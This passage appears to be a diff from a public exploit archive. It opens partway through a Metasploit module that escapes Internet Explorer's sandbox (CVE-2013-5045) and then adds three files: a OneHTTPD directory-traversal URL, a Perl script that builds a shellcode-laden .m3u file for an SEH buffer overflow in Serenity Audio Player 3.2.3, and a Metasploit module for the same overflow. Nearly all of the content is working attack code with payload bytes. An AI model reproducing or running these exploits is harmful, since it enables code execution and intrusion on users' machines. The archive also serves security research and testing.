By using registry symlinks it's possible force IE to add a policy entry in the registry
and finally bypass Enhanced Protected Mode.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Forshaw', # Vulnerability Discovery and original exploit code
'juan vazquez' # metasploit module
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'IE 8 - 11', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => "Dec 10 2013",
'References' =>
[
['CVE', '2013-5045'],
['MSB', 'MS13-097'],
['BID', '64115'],
['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
]
))
register_options(
[
OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10])
])
end
def exploit
print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
if mod_handle['return'] == 0
fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
end
unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
end
begin
Timeout.timeout(datastore['DELAY']) { super }
rescue Timeout::Error
end
session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", nil)
session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil)
end
def primer
cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd)
html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html"
session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri)
temp = get_env('TEMP')
print_status("Loading Exploit Library...")
session.core.load_library(
'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll"),
'TargetFilePath' => temp + "\\CVE-2013-5045.dll",
'UploadLibrary' => true,
'Extension' => false,
'SaveToDisk' => false
)
end
def on_request_uri(cli, request)
if request.uri =~ /\.html$/
print_status("Sending window close html...")
close_html = <<-eos
<html>
<body>
<script>
window.open('', '_self', '');
window.close();
</script>
</body>
</html>
eos
send_response(cli, close_html, { 'Content-Type' => 'text/html' })
else
send_not_found(cli)
end
end
end

9
platforms/windows/remote/33890.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/39757/info
OneHTTPD is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
OneHTTPD 0.6 is vulnerable; other versions may also be affected.
http://www.example.com/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../

33
platforms/windows/remote/33900.pl Executable file
View file

@ -0,0 +1,33 @@
source: http://www.securityfocus.com/bid/39768/info
Serenity Audio Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Serenity Audio Player 3.2.3 is vulnerable; other versions may also be affected.
#Serenity Audio Player 3.2.3 (SEH) Buffer Overflow
#Download :
http://malsmith.kyabram.biz/serenity/serenity-3.2.3-win32-installer.exe
#By Madjix Dz8[at]hotmail[dot]com
my $hd= "http://" ;
my $jnk="\x41" x 838 ;
my $nops = "\x90" x 10 ;
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $mad="\xe9\xd4\xfe\xff\xff";
my $nseh="\xeb\xf9\x90\x90";
my $seh="\xe8\x47\x40";
open(MYFILE,'>>MadjiX.m3u');
print MYFILE $hd.$jnk.$nops.$shellcode.$mad.$nseh.$seh;
close(MYFILE);

92
platforms/windows/remote/33901.rb Executable file
View file

@ -0,0 +1,92 @@
source: http://www.securityfocus.com/bid/39768/info
Serenity Audio Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Serenity Audio Player 3.2.3 is vulnerable; other versions may also be affected.
# Exploit Title: Serenity Audio Player Buffer Overflow (Meta)
# Date: April 26, 2010
# Author: Blake
# Version: 3.2.3
# Tested on: Windows XP SP3
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Serenity Audio Player Buffer Overflow Exploit',
'Description' => %q{
This module exploits a buffer overflow in Serenity Audio
Player versions 3.2.3 and below.
By creating a specially crafted m3u file, an an attacker may be
able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Blake',
],
'Version' => '$Revision: 1 $',
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/10226' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 972,
'BadChars' => "\x00\x0a\x0d\x20\x0b\x1a",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Ret' => 0x00402593} ], # pop
edi; pop esi; ret - serenity.exe
],
'Privileged' => false,
'DisclosureDate' => 'Nov 11 2009',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file
name.','exploit.m3u']),
], self.class)
end
def exploit
sploit = "http://" # header
sploit << rand_text_alphanumeric(972 - payload.encoded.length)
sploit << make_nops(10) # nop sled 1
sploit << payload.encoded # shellcode
sploit << make_nops(10) # nop sled 2
sploit << "\xe9\x4a\xfc\xff\xff" # near jump -950
sploit << "\xeb\xf9\x90\x90" # short jump
sploit << [target.ret].pack('V') # p/p/r
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sploit)
end
end